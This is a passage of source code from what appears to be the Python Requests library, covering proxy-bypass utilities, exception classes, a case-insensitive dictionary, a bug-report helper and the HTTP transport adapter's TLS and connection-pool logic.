is_valid_cidr(string_network): """ Very simple check of the cidr format in no_proxy variable. :rtype: bool """ if string_network.count("/") == 1: try: mask = int(string_network.split("/")[1]) except ValueError: return False if mask < 1 or mask > 32: return False try: socket.inet_aton(string_network.split("/")[0]) except OSError: return False else: return False return True @contextlib.contextmanager def set_environ(env_name, value): """Set the environment variable 'env_name' to 'value' Save previous value, yield, and then restore the previous value stored in the environment variable 'env_name'. If 'value' is None, do nothing""" value_changed = value is not None if value_changed: old_value = os.environ.get(env_name) os.environ[env_name] = value try: yield finally: if value_changed: if old_value is None: del os.environ[env_name] else: os.environ[env_name] = old_value def should_bypass_proxies(url, no_proxy): """ Returns whether we should bypass proxies or not. :rtype: bool """ # Prioritize lowercase environment variables over uppercase # to keep a consistent behaviour with other http projects (curl, wget). def get_proxy(key): return os.environ.get(key) or os.environ.get(key.upper()) # First check whether no_proxy is defined. If it is, check that the URL # we're getting isn't in the no_proxy list. no_proxy_arg = no_proxy if no_proxy is None: no_proxy = get_proxy("no_proxy") parsed = urlparse(url) if parsed.hostname is None: # URLs don't always have hostnames, e.g. file:/// urls. return True if no_proxy: # We need to check whether we match here. We need to see if we match # the end of the hostname, both with and without the port. no_proxy = (host for host in no_proxy.replace(" ", "").split(",") if host) if is_ipv4_address(parsed.hostname): for proxy_ip in no_proxy: if is_valid_cidr(proxy_ip): if address_in_network(parsed.hostname, proxy_ip): return True elif parsed.hostname == proxy_ip: # If no_proxy ip was defined in plain IP notation instead of cidr notation & # matches the IP of the index return True else: host_with_port = parsed.hostname if parsed.port: host_with_port += f":{parsed.port}" for host in no_proxy: if parsed.hostname.endswith(host) or host_with_port.endswith(host): # The URL does match something in no_proxy, so we don't want # to apply the proxies on this URL. return True with set_environ("no_proxy", no_proxy_arg): # parsed.hostname can be `None` in cases such as a file URI. try: bypass = proxy_bypass(parsed.hostname) except (TypeError, socket.gaierror): bypass = False if bypass: return True return False def get_environ_proxies(url, no_proxy=None): """ Return a dict of environment proxies. :rtype: dict """ if should_bypass_proxies(url, no_proxy=no_proxy): return {} else: return getproxies() def select_proxy(url, proxies): """Select a proxy for the url, if applicable. :param url: The url being for the request :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs """ proxies = proxies or {} urlparts = urlparse(url) if urlparts.hostname is None: return proxies.get(urlparts.scheme, proxies.get("all")) proxy_keys = [ urlparts.scheme + "://" + urlparts.hostname, urlparts.scheme, "all://" + urlparts.hostname, "all", ] proxy = None for proxy_key in proxy_keys: if proxy_key in proxies: proxy = proxies[proxy_key] break return proxy def resolve_proxies(request, proxies, trust_env=True): """This method takes proxy information from a request and configuration input to resolve a mapping of target proxies. This will consider settings such as NO_PROXY to strip proxy configurations. :param request: Request or PreparedRequest :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs :param trust_env: Boolean declaring whether to trust environment configs :rtype: dict """ proxies = proxies if proxies is not None else {} url = request.url scheme = urlparse(url).scheme no_proxy = proxies.get("no_proxy") new_proxies = proxies.copy() if trust_env and not should_bypass_proxies(url, no_proxy=no_proxy): environ_proxies = get_environ_proxies(url, no_proxy=no_proxy) proxy = environ_proxies.get(scheme, environ_proxies.get("all")) if proxy: new_proxies.setdefault(scheme, proxy) return new_proxies def default_user_agent(name="python-requests"): """ Return a string representing the default user agent. :rtype: str """ return f"{name}/{__version__}" def default_headers(): """ :rtype: requests.structures.CaseInsensitiveDict """ return CaseInsensitiveDict( { "User-Agent": default_user_agent(), "Accept-Encoding": DEFAULT_ACCEPT_ENCODING, "Accept": "*/*", "Connection": "keep-alive", } ) def parse_header_links(value): """Return a list of parsed link headers proxies. i.e. Link: <http:/.../front.jpeg>; rel=front; type="image/jpeg",<http://.../back.jpeg>; rel=back;type="image/jpeg" :rtype: list """ links = [] replace_chars = " '\"" value = value.strip(replace_chars) if not value: return links for val in re.split(", *<", value): try: url, params = val.split(";", 1) except ValueError: url, params = val, "" link = {"url": url.strip("<> '\"")} for param in params.split(";"): try: key, value = param.split("=") except ValueError: break link[key.strip(replace_chars)] = value.strip(replace_chars) links.append(link) return links # Null bytes; no need to recreate these on each call to guess_json_utf _null = "\x00".encode("ascii") # encoding to ASCII for Python 3 _null2 = _null * 2 _null3 = _null * 3 def guess_json_utf(data): """ :rtype: str """ # JSON always starts with two ASCII characters, so detection is as # easy as counting the nulls and from their location and count # determine the encoding. Also detect a BOM, if present. sample = data[:4] if sample in (codecs.BOM_UTF32_LE, codecs.BOM_UTF32_BE): return "utf-32" # BOM included if sample[:3] == codecs.BOM_UTF8: return "utf-8-sig" # BOM included, MS style (discouraged) if sample[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE): return "utf-16" # BOM included nullcount = sample.count(_null) if nullcount == 0: return "utf-8" if nullcount == 2: if sample[::2] == _null2: # 1st and 3rd are null return "utf-16-be" if sample[1::2] == _null2: # 2nd and 4th are null return "utf-16-le" # Did not detect 2 valid UTF-16 ascii-range characters if nullcount == 3: if sample[:3] == _null3: return "utf-32-be" if sample[1:] == _null3: return "utf-32-le" # Did not detect a valid UTF-32 ascii-range character return None def prepend_scheme_if_needed(url, new_scheme): """Given a URL that may or may not have a scheme, prepend the given scheme. Does not replace a present scheme with the one provided as an argument. :rtype: str """ parsed = parse_url(url) scheme, auth, host, port, path, query, fragment = parsed # A defect in urlparse determines that there isn't a netloc present in some # urls. We previously assumed parsing was overly cautious, and swapped the # netloc and path. Due to a lack of tests on the original defect, this is # maintained with parse_url for backwards compatibility. netloc = parsed.netloc if not netloc: netloc, path = path, netloc if auth: # parse_url doesn't provide the netloc with auth # so we'll add it ourselves. netloc = "@".join([auth, netloc]) if scheme is None: scheme = new_scheme if path is None: path = "" return urlunparse((scheme, netloc, path, "", query, fragment)) def get_auth_from_url(url): """Given a url with authentication components, extract them into a tuple of username,password. :rtype: (str,str) """ parsed = urlparse(url) try: auth = (unquote(parsed.username), unquote(parsed.password)) except (AttributeError, TypeError): auth = ("", "") return auth def check_header_validity(header): """Verifies that header parts don't contain leading whitespace reserved characters, or return characters. :param header: tuple, in the format (name, value). """ name, value = header _validate_header_part(header, name, 0) _validate_header_part(header, value, 1) def _validate_header_part(header, header_part, header_validator_index): if isinstance(header_part, str): validator = _HEADER_VALIDATORS_STR[header_validator_index] elif isinstance(header_part, bytes): validator = _HEADER_VALIDATORS_BYTE[header_validator_index] else: raise InvalidHeader( f"Header part ({header_part!r}) from {header} " f"must be of type str or bytes, not {type(header_part)}" ) if not validator.match(header_part): header_kind = "name" if header_validator_index == 0 else "value" raise InvalidHeader( f"Invalid leading whitespace, reserved character(s), or return " f"character(s) in header {header_kind}: {header_part!r}" ) def urldefragauth(url): """ Given a url remove the fragment and the authentication part. :rtype: str """ scheme, netloc, path, params, query, fragment = urlparse(url) # see func:`prepend_scheme_if_needed` if not netloc: netloc, path = path, netloc netloc = netloc.rsplit("@", 1)[-1] return urlunparse((scheme, netloc, path, params, query, "")) def rewind_body(prepared_request): """Move file pointer back to its recorded starting position so it can be read again on redirect. """ body_seek = getattr(prepared_request.body, "seek", None) if body_seek is not None and isinstance( prepared_request._body_position, integer_types ): try: body_seek(prepared_request._body_position) except OSError: raise UnrewindableBodyError( "An error occurred when rewinding request body for redirect." ) else: raise UnrewindableBodyError("Unable to rewind request body for redirect.") File: src/requests/exceptions.py """ requests.exceptions ~~~~~~~~~~~~~~~~~~~ This module contains the set of Requests' exceptions. """ from urllib3.exceptions import HTTPError as BaseHTTPError from .compat import JSONDecodeError as CompatJSONDecodeError class RequestException(IOError): """There was an ambiguous exception that occurred while handling your request. """ def __init__(self, *args, **kwargs): """Initialize RequestException with `request` and `response` objects.""" response = kwargs.pop("response", None) self.response = response self.request = kwargs.pop("request", None) if response is not None and not self.request and hasattr(response, "request"): self.request = self.response.request super().__init__(*args, **kwargs) class InvalidJSONError(RequestException): """A JSON error occurred.""" class JSONDecodeError(InvalidJSONError, CompatJSONDecodeError): """Couldn't decode the text into json""" def __init__(self, *args, **kwargs): """ Construct the JSONDecodeError instance first with all args. Then use it's args to construct the IOError so that the json specific args aren't used as IOError specific args and the error message from JSONDecodeError is preserved. """ CompatJSONDecodeError.__init__(self, *args) InvalidJSONError.__init__(self, *self.args, **kwargs) def __reduce__(self): """ The __reduce__ method called when pickling the object must be the one from the JSONDecodeError (be it json/simplejson) as it expects all the arguments for instantiation, not just one like the IOError, and the MRO would by default call the __reduce__ method from the IOError due to the inheritance order. """ return CompatJSONDecodeError.__reduce__(self) class HTTPError(RequestException): """An HTTP error occurred.""" class ConnectionError(RequestException): """A Connection error occurred.""" class ProxyError(ConnectionError): """A proxy error occurred.""" class SSLError(ConnectionError): """An SSL error occurred.""" class Timeout(RequestException): """The request timed out. Catching this error will catch both :exc:`~requests.exceptions.ConnectTimeout` and :exc:`~requests.exceptions.ReadTimeout` errors. """ class ConnectTimeout(ConnectionError, Timeout): """The request timed out while trying to connect to the remote server. Requests that produced this error are safe to retry. """ class ReadTimeout(Timeout): """The server did not send any data in the allotted amount of time.""" class URLRequired(RequestException): """A valid URL is required to make a request.""" class TooManyRedirects(RequestException): """Too many redirects.""" class MissingSchema(RequestException, ValueError): """The URL scheme (e.g. http or https) is missing.""" class InvalidSchema(RequestException, ValueError): """The URL scheme provided is either invalid or unsupported.""" class InvalidURL(RequestException, ValueError): """The URL provided was somehow invalid.""" class InvalidHeader(RequestException, ValueError): """The header value provided was somehow invalid.""" class InvalidProxyURL(InvalidURL): """The proxy URL provided is invalid.""" class ChunkedEncodingError(RequestException): """The server declared chunked encoding but sent an invalid chunk.""" class ContentDecodingError(RequestException, BaseHTTPError): """Failed to decode response content.""" class StreamConsumedError(RequestException, TypeError): """The content for this response was already consumed.""" class RetryError(RequestException): """Custom retries logic failed""" class UnrewindableBodyError(RequestException): """Requests encountered an error when trying to rewind a body.""" # Warnings class RequestsWarning(Warning): """Base warning for Requests.""" class FileModeWarning(RequestsWarning, DeprecationWarning): """A file was opened in text mode, but Requests determined its binary length.""" class RequestsDependencyWarning(RequestsWarning): """An imported dependency doesn't match the expected version range.""" File: src/requests/structures.py """ requests.structures ~~~~~~~~~~~~~~~~~~~ Data structures that power Requests. """ from collections import OrderedDict from .compat import Mapping, MutableMapping class CaseInsensitiveDict(MutableMapping): """A case-insensitive ``dict``-like object. Implements all methods and operations of ``MutableMapping`` as well as dict's ``copy``. Also provides ``lower_items``. All keys are expected to be strings. The structure remembers the case of the last key to be set, and ``iter(instance)``, ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()`` will contain case-sensitive keys. However, querying and contains testing is case insensitive:: cid = CaseInsensitiveDict() cid['Accept'] = 'application/json' cid['aCCEPT'] == 'application/json' # True list(cid) == ['Accept'] # True For example, ``headers['content-encoding']`` will return the value of a ``'Content-Encoding'`` response header, regardless of how the header name was originally stored. If the constructor, ``.update``, or equality comparison operations are given keys that have equal ``.lower()``s, the behavior is undefined. """ def __init__(self, data=None, **kwargs): self._store = OrderedDict() if data is None: data = {} self.update(data, **kwargs) def __setitem__(self, key, value): # Use the lowercased key for lookups, but store the actual # key alongside the value. self._store[key.lower()] = (key, value) def __getitem__(self, key): return self._store[key.lower()][1] def __delitem__(self, key): del self._store[key.lower()] def __iter__(self): return (casedkey for casedkey, mappedvalue in self._store.values()) def __len__(self): return len(self._store) def lower_items(self): """Like iteritems(), but with all lowercase keys.""" return ((lowerkey, keyval[1]) for (lowerkey, keyval) in self._store.items()) def __eq__(self, other): if isinstance(other, Mapping): other = CaseInsensitiveDict(other) else: return NotImplemented # Compare insensitively return dict(self.lower_items()) == dict(other.lower_items()) # Copy is required def copy(self): return CaseInsensitiveDict(self._store.values()) def __repr__(self): return str(dict(self.items())) class LookupDict(dict): """Dictionary lookup object.""" def __init__(self, name=None): self.name = name super().__init__() def __repr__(self): return f"<lookup '{self.name}'>" def __getitem__(self, key): # We allow fall-through here, so values default to None return self.__dict__.get(key, None) def get(self, key, default=None): return self.__dict__.get(key, default) File: src/requests/help.py """Module containing bug report helper(s).""" import json import platform import ssl import sys import idna import urllib3 from . import __version__ as requests_version try: import charset_normalizer except ImportError: charset_normalizer = None try: import chardet except ImportError: chardet = None try: from urllib3.contrib import pyopenssl except ImportError: pyopenssl = None OpenSSL = None cryptography = None else: import cryptography import OpenSSL def _implementation(): """Return a dict with the Python implementation and version. Provide both the name and the version of the Python implementation currently running. For example, on CPython 3.10.3 it will return {'name': 'CPython', 'version': '3.10.3'}. This function works best on CPython and PyPy: in particular, it probably doesn't work for Jython or IronPython. Future investigation should be done to work out the correct shape of the code for those platforms. """ implementation = platform.python_implementation() if implementation == "CPython": implementation_version = platform.python_version() elif implementation == "PyPy": implementation_version = "{}.{}.{}".format( sys.pypy_version_info.major, sys.pypy_version_info.minor, sys.pypy_version_info.micro, ) if sys.pypy_version_info.releaselevel != "final": implementation_version = "".join( [implementation_version, sys.pypy_version_info.releaselevel] ) elif implementation == "Jython": implementation_version = platform.python_version() # Complete Guess elif implementation == "IronPython": implementation_version = platform.python_version() # Complete Guess else: implementation_version = "Unknown" return {"name": implementation, "version": implementation_version} def info(): """Generate information for a bug report.""" try: platform_info = { "system": platform.system(), "release": platform.release(), } except OSError: platform_info = { "system": "Unknown", "release": "Unknown", } implementation_info = _implementation() urllib3_info = {"version": urllib3.__version__} charset_normalizer_info = {"version": None} chardet_info = {"version": None} if charset_normalizer: charset_normalizer_info = {"version": charset_normalizer.__version__} if chardet: chardet_info = {"version": chardet.__version__} pyopenssl_info = { "version": None, "openssl_version": "", } if OpenSSL: pyopenssl_info = { "version": OpenSSL.__version__, "openssl_version": f"{OpenSSL.SSL.OPENSSL_VERSION_NUMBER:x}", } cryptography_info = { "version": getattr(cryptography, "__version__", ""), } idna_info = { "version": getattr(idna, "__version__", ""), } system_ssl = ssl.OPENSSL_VERSION_NUMBER system_ssl_info = {"version": f"{system_ssl:x}" if system_ssl is not None else ""} return { "platform": platform_info, "implementation": implementation_info, "system_ssl": system_ssl_info, "using_pyopenssl": pyopenssl is not None, "using_charset_normalizer": chardet is None, "pyOpenSSL": pyopenssl_info, "urllib3": urllib3_info, "chardet": chardet_info, "charset_normalizer": charset_normalizer_info, "cryptography": cryptography_info, "idna": idna_info, "requests": { "version": requests_version, }, } def main(): """Pretty-print the bug information as JSON.""" print(json.dumps(info(), sort_keys=True, indent=2)) if __name__ == "__main__": main() File: src/requests/adapters.py """ requests.adapters ~~~~~~~~~~~~~~~~~ This module contains the transport adapters that Requests uses to define and maintain connections. """ import os.path import socket # noqa: F401 import typing import warnings from urllib3.exceptions import ClosedPoolError, ConnectTimeoutError from urllib3.exceptions import HTTPError as _HTTPError from urllib3.exceptions import InvalidHeader as _InvalidHeader from urllib3.exceptions import ( LocationValueError, MaxRetryError, NewConnectionError, ProtocolError, ) from urllib3.exceptions import ProxyError as _ProxyError from urllib3.exceptions import ReadTimeoutError, ResponseError from urllib3.exceptions import SSLError as _SSLError from urllib3.poolmanager import PoolManager, proxy_from_url from urllib3.util import Timeout as TimeoutSauce from urllib3.util import parse_url from urllib3.util.retry import Retry from urllib3.util.ssl_ import create_urllib3_context from .auth import _basic_auth_str from .compat import basestring, urlparse from .cookies import extract_cookies_to_jar from .exceptions import ( ConnectionError, ConnectTimeout, InvalidHeader, InvalidProxyURL, InvalidSchema, InvalidURL, ProxyError, ReadTimeout, RetryError, SSLError, ) from .models import Response from .structures import CaseInsensitiveDict from .utils import ( DEFAULT_CA_BUNDLE_PATH, extract_zipped_paths, get_auth_from_url, get_encoding_from_headers, prepend_scheme_if_needed, select_proxy, urldefragauth, ) try: from urllib3.contrib.socks import SOCKSProxyManager except ImportError: def SOCKSProxyManager(*args, **kwargs): raise InvalidSchema("Missing dependencies for SOCKS support.") if typing.TYPE_CHECKING: from .models import PreparedRequest DEFAULT_POOLBLOCK = False DEFAULT_POOLSIZE = 10 DEFAULT_RETRIES = 0 DEFAULT_POOL_TIMEOUT = None try: import ssl # noqa: F401 _preloaded_ssl_context = create_urllib3_context() _preloaded_ssl_context.load_verify_locations( extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH) ) except ImportError: # Bypass default SSLContext creation when Python # interpreter isn't built with the ssl module. _preloaded_ssl_context = None def _urllib3_request_context( request: "PreparedRequest", verify: "bool | str | None", client_cert: "typing.Tuple[str, str] | str | None", poolmanager: "PoolManager", ) -> "(typing.Dict[str, typing.Any], typing.Dict[str, typing.Any])": host_params = {} pool_kwargs = {} parsed_request_url = urlparse(request.url) scheme = parsed_request_url.scheme.lower() port = parsed_request_url.port # Determine if we have and should use our default SSLContext # to optimize performance on standard requests. poolmanager_kwargs = getattr(poolmanager, "connection_pool_kw", {}) has_poolmanager_ssl_context = poolmanager_kwargs.get("ssl_context") should_use_default_ssl_context = ( _preloaded_ssl_context is not None and not has_poolmanager_ssl_context ) cert_reqs = "CERT_REQUIRED" if verify is False: cert_reqs = "CERT_NONE" elif verify is True and should_use_default_ssl_context: pool_kwargs["ssl_context"] = _preloaded_ssl_context elif isinstance(verify, str): if not os.path.isdir(verify): pool_kwargs["ca_certs"] = verify else: pool_kwargs["ca_cert_dir"] = verify pool_kwargs["cert_reqs"] = cert_reqs if client_cert is not None: if isinstance(client_cert, tuple) and len(client_cert) == 2: pool_kwargs["cert_file"] = client_cert[0] pool_kwargs["key_file"] = client_cert[1] else: # According to our docs, we allow users to specify just the client # cert path pool_kwargs["cert_file"] = client_cert host_params = { "scheme": scheme, "host": parsed_request_url.hostname, "port": port, } return host_params, pool_kwargs class BaseAdapter: """The Base Transport Adapter""" def __init__(self): super().__init__() def send( self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None ): """Sends PreparedRequest object. Returns Response object. :param request: The :class:`PreparedRequest <PreparedRequest>` being sent. :param stream: (optional) Whether to stream the request content. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use :param cert: (optional) Any user-provided SSL certificate to be trusted. :param proxies: (optional) The proxies dictionary to apply to the request. """ raise NotImplementedError def close(self): """Cleans up adapter specific items.""" raise NotImplementedError class HTTPAdapter(BaseAdapter): """The built-in HTTP Adapter for urllib3. Provides a general-case interface for Requests sessions to contact HTTP and HTTPS urls by implementing the Transport Adapter interface. This class will usually be created by the :class:`Session <Session>` class under the covers. :param pool_connections: The number of urllib3 connection pools to cache. :param pool_maxsize: The maximum number of connections to save in the pool. :param max_retries: The maximum number of retries each connection should attempt. Note, this applies only to failed DNS lookups, socket connections and connection timeouts, never to requests where data has made it to the server. By default, Requests does not retry failed connections. If you need granular control over the conditions under which we retry a request, import urllib3's ``Retry`` class and pass that instead. :param pool_block: Whether the connection pool should block for connections. Usage:: >>> import requests >>> s = requests.Session() >>> a = requests.adapters.HTTPAdapter(max_retries=3) >>> s.mount('http://', a) """ __attrs__ = [ "max_retries", "config", "_pool_connections", "_pool_maxsize", "_pool_block", ] def __init__( self, pool_connections=DEFAULT_POOLSIZE, pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES, pool_block=DEFAULT_POOLBLOCK, ): if max_retries == DEFAULT_RETRIES: self.max_retries = Retry(0, read=False) else: self.max_retries = Retry.from_int(max_retries) self.config = {} self.proxy_manager = {} super().__init__() self._pool_connections = pool_connections self._pool_maxsize = pool_maxsize self._pool_block = pool_block self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block) def __getstate__(self): return {attr: getattr(self, attr, None) for attr in self.__attrs__} def __setstate__(self, state): # Can't handle by adding 'proxy_manager' to self.__attrs__ because # self.poolmanager uses a lambda function, which isn't pickleable. self.proxy_manager = {} self.config = {} for attr, value in state.items(): setattr(self, attr, value) self.init_poolmanager( self._pool_connections, self._pool_maxsize, block=self._pool_block ) def init_poolmanager( self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs ): """Initializes a urllib3 PoolManager. This method should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param connections: The number of urllib3 connection pools to cache. :param maxsize: The maximum number of connections to save in the pool. :param block: Block when no free connections are available. :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager. """ # save these values for pickling self._pool_connections = connections self._pool_maxsize = maxsize self._pool_block = block self.poolmanager = PoolManager( num_pools=connections, maxsize=maxsize, block=block, **pool_kwargs, ) def proxy_manager_for(self, proxy, **proxy_kwargs): """Return urllib3 ProxyManager for the given proxy. This method should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param proxy: The proxy to return a urllib3 ProxyManager for. :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager. :returns: ProxyManager :rtype: urllib3.ProxyManager """ if proxy in self.proxy_manager: manager = self.proxy_manager[proxy] elif proxy.lower().startswith("socks"): username, password = get_auth_from_url(proxy) manager = self.proxy_manager[proxy] = SOCKSProxyManager( proxy, username=username, password=password, num_pools=self._pool_connections, maxsize=self._pool_maxsize, block=self._pool_block, **proxy_kwargs, ) else: proxy_headers = self.proxy_headers(proxy) manager = self.proxy_manager[proxy] = proxy_from_url( proxy, proxy_headers=proxy_headers, num_pools=self._pool_connections, maxsize=self._pool_maxsize, block=self._pool_block, **proxy_kwargs, ) return manager def cert_verify(self, conn, url, verify, cert): """Verify a SSL certificate. This method should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param conn: The urllib3 connection object associated with the cert. :param url: The requested URL. :param verify: Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use :param cert: The SSL certificate to verify. """ if url.lower().startswith("https") and verify: conn.cert_reqs = "CERT_REQUIRED" # Only load the CA certificates if 'verify' is a string indicating the CA bundle to use. # Otherwise, if verify is a boolean, we don't load anything since # the connection will be using a context with the default certificates already loaded, # and this avoids a call to the slow load_verify_locations() if verify is not True: # `verify` must be a str with a path then cert_loc = verify if not os.path.exists(cert_loc): raise OSError( f"Could not find a suitable TLS CA certificate bundle, " f"invalid path: {cert_loc}" ) if not os.path.isdir(cert_loc): conn.ca_certs = cert_loc else: conn.ca_cert_dir = cert_loc else: conn.cert_reqs = "CERT_NONE" conn.ca_certs = None conn.ca_cert_dir = None if cert: if not isinstance(cert, basestring): conn.cert_file = cert[0] conn.key_file = cert[1] else: conn.cert_file = cert conn.key_file = None if conn.cert_file and not os.path.exists(conn.cert_file): raise OSError( f"Could not find the TLS certificate file, " f"invalid path: {conn.cert_file}" ) if conn.key_file and not os.path.exists(conn.key_file): raise OSError( f"Could not find the TLS key file, invalid path: {conn.key_file}" ) def build_response(self, req, resp): """Builds a :class:`Response <requests.Response>` object from a urllib3 response. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>` :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response. :param resp: The urllib3 response object. :rtype: requests.Response """ response = Response() # Fallback to None if there's no status_code, for whatever reason. response.status_code = getattr(resp, "status", None) # Make headers case-insensitive. response.headers = CaseInsensitiveDict(getattr(resp, "headers", {})) # Set encoding. response.encoding = get_encoding_from_headers(response.headers) response.raw = resp response.reason = response.raw.reason if isinstance(req.url, bytes): response.url = req.url.decode("utf-8") else: response.url = req.url # Add new cookies from the server. extract_cookies_to_jar(response.cookies, req, resp) # Give the Response some context. response.request = req response.connection = self return response def build_connection_pool_key_attributes(self, request, verify, cert=None): """Build the PoolKey attributes used by urllib3 to return a connection. This looks at the PreparedRequest, the user-specified verify value, and the value of the cert parameter to determine what PoolKey values to use to select a connection from a given urllib3 Connection Pool. The SSL related pool key arguments are not consistently set. As of this writing, use the following to determine what keys may be in that dictionary: * If ``verify`` is ``True``, ``"ssl_context"`` will be set and will be the default Requests SSL Context * If ``verify`` is ``False``, ``"ssl_context"`` will not be set but ``"cert_reqs"`` will be set * If ``verify`` is a string, (i.e., it is a user-specified trust bundle) ``"ca_certs"`` will be set if the string is not a directory recognized by :py:func:`os.path.isdir`, otherwise ``"ca_certs_dir"`` will be set. * If ``"cert"`` is specified, ``"cert_file"`` will always be set. If ``"cert"`` is a tuple with a second item, ``"key_file"`` will also be present To override these settings, one may subclass this class, call this method and use the above logic to change parameters as desired. For example, if one wishes to use a custom :py:class:`ssl.SSLContext` one must both set ``"ssl_context"`` and based on what else they require, alter the other keys to ensure the desired behaviour. :param request: The PreparedReqest being sent over the connection. :type request: :class:`~requests.models.PreparedRequest` :param verify: Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. :param cert: (optional) Any user-provided SSL certificate for client authentication (a.k.a., mTLS). This may be a string (i.e., just the path to a file which holds both certificate and key) or a tuple of length 2 with the certificate file path and key file path. :returns: A tuple of two dictionaries. The first is the "host parameters" portion of the Pool Key including scheme, hostname, and port. The second is a dictionary of SSLContext related parameters. """ return _urllib3_request_context(request, verify, cert, self.poolmanager) def get_connection_with_tls_context(self, request, verify, proxies=None, cert=None): """Returns a urllib3 connection for the given request and TLS settings. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param request: The :class:`PreparedRequest <PreparedRequest>` object to be sent over the connection. :param verify: Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use. :param proxies: (optional) The proxies dictionary to apply to the request. :param cert: (optional) Any user-provided SSL certificate to be used for client authentication (a.k.a., mTLS). :rtype: urllib3.ConnectionPool """ proxy = select_proxy(request.url, proxies) try: host_params, pool_kwargs = self.build_connection_pool_key_attributes( request, verify, cert, ) except ValueError as e: raise InvalidURL(e, request=request) if proxy: proxy = prepend_scheme_if_needed(proxy, "http") proxy_url = parse_url(proxy) if not proxy_url.host: raise InvalidProxyURL( "Please check proxy URL. It is malformed " "and could be missing the host." ) proxy_manager = self.proxy_manager_for(proxy) conn = proxy_manager.connection_from_host( **host_params, pool_kwargs=pool_kwargs ) else: # Only scheme should be lower case conn = self.poolmanager.connection_from_host( **host_params, pool_kwargs=pool_kwargs ) return conn def get_connection(self, url, proxies=None): """DEPRECATED: Users should move to `get_connection_with_tls_context` for all subclasses of HTTPAdapter using Requests>=2.32.2. Returns a urllib3 connection for the given URL. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param url: The URL to connect to. :param proxies: (optional) A Requests-style dictionary of proxies used on this request. :rtype: urllib3.ConnectionPool """ warnings.warn( ( "`get_connection` has been deprecated in favor of " "`get_connection_with_tls_context`. Custom HTTPAdapter subclasses " "will need to migrate for Requests>=2.32.2. Please see " "https://github.com/psf/requests/pull/6710 for more details." ), DeprecationWarning, ) proxy = select_proxy(url, proxies) if proxy: proxy = prepend_scheme_if_needed(proxy, "http") proxy_url = parse_url(proxy) if not proxy_url.host: raise InvalidProxyURL( "Please check proxy URL. It is malformed " "and could be missing the host." ) proxy_manager = self.proxy_manager_for(proxy) conn = proxy_manager.connection_from_url(url) else: # Only scheme should be lower case parsed = urlparse(url) url = parsed.geturl() conn = self.poolmanager.connection_from_url(url) return conn def close(self): """Disposes of any internal state. Currently, this closes the PoolManager and any active ProxyManager, which closes any pooled connections. """ self.poolmanager.clear() for proxy in self.proxy_manager.values(): proxy.clear() def request_url(self, request, proxies): """Obtain the url to use when making the final request. If the message is being sent through a HTTP proxy, the full URL has to be used. Otherwise, we should only use the path portion of the URL. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param request: The :class:`PreparedRequest <PreparedRequest>` being sent. :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs. :rtype: str """ proxy = select_proxy(request.url, proxies) scheme = urlparse(request.url).scheme is_proxied_http_request = proxy and scheme != "https" using_socks_proxy = False if proxy: proxy_scheme = urlparse(proxy).scheme.lower() using_socks_proxy = proxy_scheme.startswith("socks") url = request.path_url if url.startswith("//"): # Don't confuse urllib3 url = f"/{url.lstrip('/')}" if is_proxied_http_request and not using_socks_proxy: url = urldefragauth(request.url) return url def add_headers(self, request, **kwargs): """Add any headers needed by the connection. As of v2.0 this does nothing by default, but is left for overriding by users that subclass the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to. :param kwargs: The keyword arguments from the call to send(). """ pass def proxy_headers(self, proxy): """Returns a dictionary of the headers to add to any request sent through a proxy. This works with urllib3 magic to ensure that they are correctly sent to the proxy, rather than in a tunnelled request if CONNECT is being used. This should not be called from user code, and is only exposed for use when subclassing the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`. :param proxy: The url of the proxy being used for this request. :rtype: dict """ headers = {} username, password = get_auth_from_url(proxy) if username: headers["Proxy-Authorization"] = _basic_auth_str(username, password) return headers def send( self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None ): """Sends PreparedRequest object. Returns Response object. :param request: The :class:`PreparedRequest <PreparedRequest>` being sent. :param stream: (optional) Whether to stream the request content. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a :ref:`(connect timeout, read timeout) <timeouts>` tuple. :type timeout: float or tuple or urllib3 Timeout object :param verify: (optional) Either a boolean, in which case it controls whether we verify the server's TLS certificate, or a string, in which case it must be a path to a CA bundle to use :param cert: (optional) Any user-provided SSL certificate to be trusted. :param proxies: (optional) The proxies dictionary to apply to the request. :rtype: requests.Response """ try: conn = self.get_connection_with_tls_context( request, verify, proxies=proxies, cert=cert ) except LocationValueError as e: raise InvalidURL(e, request=request) self.cert_verify(conn, 